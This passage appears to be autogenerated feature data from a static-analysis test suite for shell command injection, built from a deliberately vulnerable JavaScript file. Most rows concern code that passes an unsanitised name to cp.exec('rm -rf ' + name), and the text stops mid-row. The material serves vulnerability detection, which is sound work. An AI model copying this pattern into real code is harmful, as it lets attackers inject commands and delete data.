autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:11:35:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:23:35:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:23:35:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:23:35:26 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:23:35:26 | name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:23:35:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:23:35:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:2:39:2 | static ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:2:39:2 | static ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:2:39:2 | static ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:2:39:2 | static ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:2:39:2 | static ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:2:39:2 | static ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:9:37:11 | foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:9:37:11 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:9:37:11 | foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | this | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:37:11 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | 'arguments' object of method foo of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | 'arguments' object of method foo of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | 'arguments' object of method foo of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | 'arguments' object of method foo of class Cla3 | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | 'arguments' object of method foo of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | (name) ... T OK\\n\\t} | assignedToPropName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | (name) ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | (name) ... T OK\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | (name) ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | exceptional return of method foo of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | exceptional return of method foo of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | exceptional return of method foo of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | exceptional return of method foo of class Cla3 | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | exceptional return of method foo of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | return of method foo of class Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | return of method foo of class Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | return of method foo of class Cla3 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | return of method foo of class Cla3 | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:12:39:2 | return of method foo of class Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:37:13:37:16 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:4 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:4 | cp | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:9 | cp.exec | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 